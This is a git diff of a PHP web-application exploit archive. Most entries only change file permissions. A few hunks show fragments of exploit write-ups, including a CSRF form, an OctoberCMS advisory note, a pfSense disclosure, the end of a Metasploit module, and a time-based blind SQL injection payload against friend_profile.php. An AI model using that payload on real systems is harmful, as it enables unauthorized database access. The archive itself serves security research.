b/platforms/php/webapps/43101.txt old mode 100755 new mode 100644 index 0504d53af..2ec0861f4 --- a/platforms/php/webapps/43101.txt +++ b/platforms/php/webapps/43101.txt @@ -26,4 +26,4 @@ <label for="form_password">Password:</label> <input type="password" name="password" id="form_password" /> <input name="login" value="Log In" type="submit"> -</form> +</form> \ No newline at end of file diff --git a/platforms/php/webapps/43102.txt b/platforms/php/webapps/43102.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43106.txt b/platforms/php/webapps/43106.txt old mode 100755 new mode 100644 index b1bea002c..8efdefdf1 --- a/platforms/php/webapps/43106.txt +++ b/platforms/php/webapps/43106.txt @@ -43,7 +43,4 @@ Upon execution of this CSRF, the Admin Account details will be replaced by ours 4. Solution -The vulnerability will be patched by the vendor in the next release of OctoberCMS.Following changes should be made for a temporary fix (https://github.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0). - - - +The vulnerability will be patched by the vendor in the next release of OctoberCMS.Following changes should be made for a temporary fix (https://github.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0). \ No newline at end of file diff --git a/platforms/php/webapps/43108.txt b/platforms/php/webapps/43108.txt old mode 100755 new mode 100644 index c65ed6778..534b32a47 --- a/platforms/php/webapps/43108.txt +++ b/platforms/php/webapps/43108.txt @@ -28,10 +28,4 @@ http://localhost/view/friend_profile.php?friend_type=Student&friend_index=[SQL_i Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: friend_type=Student&friend_index=1' AND SLEEP(5) AND 'rliO'='rliO - Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - - - - - + Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) \ No newline at end of file diff --git a/platforms/php/webapps/43110.txt b/platforms/php/webapps/43110.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43117.txt b/platforms/php/webapps/43117.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43128.txt b/platforms/php/webapps/43128.txt old mode 100755 new mode 100644 index f5d5487b7..19973aa51 --- a/platforms/php/webapps/43128.txt +++ b/platforms/php/webapps/43128.txt @@ -24,4 +24,4 @@ Upgrade to the latest version of pfSense (2.3.1_5 on is fixed). This may be perf the console. See https://doc.pfsense.org/index.php/Upgrade_Guide Furthermore, the issues can be mitigated by restricting access to the firewall GUI both with firewall rules and by not allowing untrusted users to have accounts with GUI access, and by not granting untrusted administrators access to the pages in question. Issue was responsibly disclosed to pfSense (security@pfsense.org) on 06/08/2016 and fixed 06/09/2016! -Thank you to Jim P and the pfSense team for the impressive response time. +Thank you to Jim P and the pfSense team for the impressive response time. \ No newline at end of file diff --git a/platforms/php/webapps/43138.rb b/platforms/php/webapps/43138.rb index 1a37fe626..40d7d788b 100755 --- a/platforms/php/webapps/43138.rb +++ b/platforms/php/webapps/43138.rb @@ -246,4 +246,4 @@ class MetasploitModule < Msf::Exploit::Remote print_error "Error obtaining credentails" end end -end \ No newline at end of file +end \ No newline at end of file diff --git a/platforms/php/webapps/43140.txt b/platforms/php/webapps/43140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4317.txt b/platforms/php/webapps/4317.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4320.txt b/platforms/php/webapps/4320.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4326.txt b/platforms/php/webapps/4326.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4327.txt b/platforms/php/webapps/4327.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4329.txt b/platforms/php/webapps/4329.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4330.txt b/platforms/php/webapps/4330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4332.txt b/platforms/php/webapps/4332.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4333.txt b/platforms/php/webapps/4333.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4336.txt b/platforms/php/webapps/4336.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4339.txt b/platforms/php/webapps/4339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4340.txt b/platforms/php/webapps/4340.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4341.txt b/platforms/php/webapps/4341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4342.txt b/platforms/php/webapps/4342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4350.php b/platforms/php/webapps/4350.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4352.txt b/platforms/php/webapps/4352.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4353.txt b/platforms/php/webapps/4353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4356.txt b/platforms/php/webapps/4356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4358.txt b/platforms/php/webapps/4358.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/436.txt b/platforms/php/webapps/436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4363.txt b/platforms/php/webapps/4363.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4365.txt b/platforms/php/webapps/4365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4368.txt b/platforms/php/webapps/4368.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4370.txt b/platforms/php/webapps/4370.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4371.txt b/platforms/php/webapps/4371.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4374.txt b/platforms/php/webapps/4374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4376.txt b/platforms/php/webapps/4376.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4377.txt b/platforms/php/webapps/4377.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4378.htm b/platforms/php/webapps/4378.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4380.txt b/platforms/php/webapps/4380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4381.txt b/platforms/php/webapps/4381.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4382.txt b/platforms/php/webapps/4382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4383.txt b/platforms/php/webapps/4383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4384.txt b/platforms/php/webapps/4384.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4385.txt b/platforms/php/webapps/4385.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4386.txt b/platforms/php/webapps/4386.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4387.txt b/platforms/php/webapps/4387.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4390.txt b/platforms/php/webapps/4390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4395.txt b/platforms/php/webapps/4395.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4396.txt b/platforms/php/webapps/4396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4400.txt b/platforms/php/webapps/4400.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4401.txt b/platforms/php/webapps/4401.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4404.txt b/platforms/php/webapps/4404.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4405.txt b/platforms/php/webapps/4405.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4406.txt b/platforms/php/webapps/4406.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4407.java b/platforms/php/webapps/4407.java old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4410.php b/platforms/php/webapps/4410.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4411.txt b/platforms/php/webapps/4411.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4415.txt b/platforms/php/webapps/4415.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4416.txt b/platforms/php/webapps/4416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4417.txt b/platforms/php/webapps/4417.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4419.php b/platforms/php/webapps/4419.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4421.txt b/platforms/php/webapps/4421.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4422.txt b/platforms/php/webapps/4422.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4423.txt b/platforms/php/webapps/4423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4430.txt b/platforms/php/webapps/4430.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4434.txt b/platforms/php/webapps/4434.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4439.txt b/platforms/php/webapps/4439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4440.txt b/platforms/php/webapps/4440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4441.txt b/platforms/php/webapps/4441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4442.txt b/platforms/php/webapps/4442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4443.txt b/platforms/php/webapps/4443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4444.txt b/platforms/php/webapps/4444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4446.txt b/platforms/php/webapps/4446.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4447.txt b/platforms/php/webapps/4447.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4448.txt b/platforms/php/webapps/4448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4449.txt b/platforms/php/webapps/4449.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4451.txt b/platforms/php/webapps/4451.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4454.txt b/platforms/php/webapps/4454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4456.txt b/platforms/php/webapps/4456.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4457.txt b/platforms/php/webapps/4457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4459.txt b/platforms/php/webapps/4459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4461.txt b/platforms/php/webapps/4461.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4462.txt b/platforms/php/webapps/4462.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4463.txt b/platforms/php/webapps/4463.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4464.txt b/platforms/php/webapps/4464.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4465.txt b/platforms/php/webapps/4465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4466.php b/platforms/php/webapps/4466.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4469.txt b/platforms/php/webapps/4469.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4470.txt b/platforms/php/webapps/4470.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4471.txt b/platforms/php/webapps/4471.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4472.txt b/platforms/php/webapps/4472.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4473.txt b/platforms/php/webapps/4473.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4475.php b/platforms/php/webapps/4475.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4476.txt b/platforms/php/webapps/4476.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4477.txt b/platforms/php/webapps/4477.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4481.txt b/platforms/php/webapps/4481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4482.txt b/platforms/php/webapps/4482.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4483.txt b/platforms/php/webapps/4483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4485.txt b/platforms/php/webapps/4485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4489.txt b/platforms/php/webapps/4489.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4490.txt b/platforms/php/webapps/4490.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4491.php b/platforms/php/webapps/4491.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4492.txt b/platforms/php/webapps/4492.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4493.txt b/platforms/php/webapps/4493.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4494.txt b/platforms/php/webapps/4494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4495.txt b/platforms/php/webapps/4495.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4496.txt b/platforms/php/webapps/4496.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4497.txt b/platforms/php/webapps/4497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4499.txt b/platforms/php/webapps/4499.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4500.txt b/platforms/php/webapps/4500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4501.php b/platforms/php/webapps/4501.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4502.txt b/platforms/php/webapps/4502.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4503.txt b/platforms/php/webapps/4503.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4504.txt b/platforms/php/webapps/4504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4505.php b/platforms/php/webapps/4505.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4507.txt b/platforms/php/webapps/4507.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4508.txt b/platforms/php/webapps/4508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4509.txt b/platforms/php/webapps/4509.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4510.txt b/platforms/php/webapps/4510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4512.txt b/platforms/php/webapps/4512.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4513.php b/platforms/php/webapps/4513.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4518.txt b/platforms/php/webapps/4518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4519.txt b/platforms/php/webapps/4519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4520.txt b/platforms/php/webapps/4520.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4521.txt b/platforms/php/webapps/4521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4524.txt b/platforms/php/webapps/4524.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4527.txt b/platforms/php/webapps/4527.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4528.txt b/platforms/php/webapps/4528.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4536.txt b/platforms/php/webapps/4536.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4538.txt b/platforms/php/webapps/4538.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4539.txt b/platforms/php/webapps/4539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4543.txt b/platforms/php/webapps/4543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4544.txt b/platforms/php/webapps/4544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4545.txt b/platforms/php/webapps/4545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4546.txt b/platforms/php/webapps/4546.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4548.php b/platforms/php/webapps/4548.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4549.txt b/platforms/php/webapps/4549.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4551.txt b/platforms/php/webapps/4551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4554.txt b/platforms/php/webapps/4554.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4555.txt b/platforms/php/webapps/4555.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4557.txt b/platforms/php/webapps/4557.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4558.txt b/platforms/php/webapps/4558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4561.txt b/platforms/php/webapps/4561.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4562.txt b/platforms/php/webapps/4562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4563.txt b/platforms/php/webapps/4563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4565.txt b/platforms/php/webapps/4565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4568.txt b/platforms/php/webapps/4568.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4575.txt b/platforms/php/webapps/4575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4576.txt b/platforms/php/webapps/4576.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4577.txt b/platforms/php/webapps/4577.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4580.txt b/platforms/php/webapps/4580.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4581.txt b/platforms/php/webapps/4581.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4582.txt b/platforms/php/webapps/4582.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4585.txt b/platforms/php/webapps/4585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4586.txt b/platforms/php/webapps/4586.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4587.txt b/platforms/php/webapps/4587.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4588.txt b/platforms/php/webapps/4588.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4589.htm b/platforms/php/webapps/4589.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4591.txt b/platforms/php/webapps/4591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4592.txt b/platforms/php/webapps/4592.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4593.txt b/platforms/php/webapps/4593.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4595.txt b/platforms/php/webapps/4595.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4596.txt b/platforms/php/webapps/4596.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4597.txt b/platforms/php/webapps/4597.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4599.txt b/platforms/php/webapps/4599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4602.txt b/platforms/php/webapps/4602.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4603.txt b/platforms/php/webapps/4603.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4604.txt b/platforms/php/webapps/4604.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4605.txt b/platforms/php/webapps/4605.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4606.txt b/platforms/php/webapps/4606.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4607.txt b/platforms/php/webapps/4607.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4608.php b/platforms/php/webapps/4608.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4611.txt b/platforms/php/webapps/4611.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4614.txt b/platforms/php/webapps/4614.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4617.txt b/platforms/php/webapps/4617.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4618.txt b/platforms/php/webapps/4618.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4619.txt b/platforms/php/webapps/4619.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4620.txt b/platforms/php/webapps/4620.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4621.txt b/platforms/php/webapps/4621.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4622.txt b/platforms/php/webapps/4622.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4623.txt b/platforms/php/webapps/4623.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4626.txt b/platforms/php/webapps/4626.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4627.txt b/platforms/php/webapps/4627.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4628.txt b/platforms/php/webapps/4628.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4629.txt b/platforms/php/webapps/4629.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4630.txt b/platforms/php/webapps/4630.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4631.txt b/platforms/php/webapps/4631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4632.txt b/platforms/php/webapps/4632.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4633.txt b/platforms/php/webapps/4633.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4634.php b/platforms/php/webapps/4634.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4635.php b/platforms/php/webapps/4635.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4636.txt b/platforms/php/webapps/4636.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4637.txt b/platforms/php/webapps/4637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4638.txt b/platforms/php/webapps/4638.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4639.htm b/platforms/php/webapps/4639.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4640.txt b/platforms/php/webapps/4640.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4641.txt b/platforms/php/webapps/4641.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4642.txt b/platforms/php/webapps/4642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4645.txt b/platforms/php/webapps/4645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4649.txt b/platforms/php/webapps/4649.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4650.txt b/platforms/php/webapps/4650.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4652.txt b/platforms/php/webapps/4652.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4653.txt b/platforms/php/webapps/4653.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4654.txt b/platforms/php/webapps/4654.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4655.txt b/platforms/php/webapps/4655.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4656.txt b/platforms/php/webapps/4656.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4658.php b/platforms/php/webapps/4658.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4659.txt b/platforms/php/webapps/4659.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4662.txt b/platforms/php/webapps/4662.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4665.txt b/platforms/php/webapps/4665.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4666.txt b/platforms/php/webapps/4666.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4667.txt b/platforms/php/webapps/4667.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4668.txt b/platforms/php/webapps/4668.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4669.txt b/platforms/php/webapps/4669.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4670.txt b/platforms/php/webapps/4670.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4671.txt b/platforms/php/webapps/4671.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4672.txt b/platforms/php/webapps/4672.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4674.txt b/platforms/php/webapps/4674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4675.txt b/platforms/php/webapps/4675.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4676.txt b/platforms/php/webapps/4676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4677.txt b/platforms/php/webapps/4677.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4678.php b/platforms/php/webapps/4678.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4679.txt b/platforms/php/webapps/4679.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4680.txt b/platforms/php/webapps/4680.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4681.txt b/platforms/php/webapps/4681.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4684.txt b/platforms/php/webapps/4684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4685.txt b/platforms/php/webapps/4685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4686.txt b/platforms/php/webapps/4686.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4691.txt b/platforms/php/webapps/4691.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4693.txt b/platforms/php/webapps/4693.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4694.txt b/platforms/php/webapps/4694.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4695.txt b/platforms/php/webapps/4695.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4696.txt b/platforms/php/webapps/4696.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/47.c b/platforms/php/webapps/47.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4704.txt b/platforms/php/webapps/4704.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4705.txt b/platforms/php/webapps/4705.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4706.txt b/platforms/php/webapps/4706.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4707.txt b/platforms/php/webapps/4707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4708.txt b/platforms/php/webapps/4708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4709.txt b/platforms/php/webapps/4709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4710.txt b/platforms/php/webapps/4710.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4711.txt b/platforms/php/webapps/4711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4712.txt b/platforms/php/webapps/4712.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4719.txt b/platforms/php/webapps/4719.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4721.txt b/platforms/php/webapps/4721.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4722.txt b/platforms/php/webapps/4722.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4725.txt b/platforms/php/webapps/4725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4726.txt b/platforms/php/webapps/4726.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4727.txt b/platforms/php/webapps/4727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4728.txt b/platforms/php/webapps/4728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4729.txt b/platforms/php/webapps/4729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4731.php b/platforms/php/webapps/4731.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4733.txt b/platforms/php/webapps/4733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4734.txt b/platforms/php/webapps/4734.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4735.txt b/platforms/php/webapps/4735.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4736.txt b/platforms/php/webapps/4736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4737.txt b/platforms/php/webapps/4737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4738.txt b/platforms/php/webapps/4738.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4741.txt b/platforms/php/webapps/4741.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4750.txt b/platforms/php/webapps/4750.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4753.txt b/platforms/php/webapps/4753.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4755.txt b/platforms/php/webapps/4755.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4758.txt b/platforms/php/webapps/4758.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4762.txt b/platforms/php/webapps/4762.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4763.txt b/platforms/php/webapps/4763.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4764.txt b/platforms/php/webapps/4764.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4765.txt b/platforms/php/webapps/4765.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4766.txt b/platforms/php/webapps/4766.txt old mode 100755 new 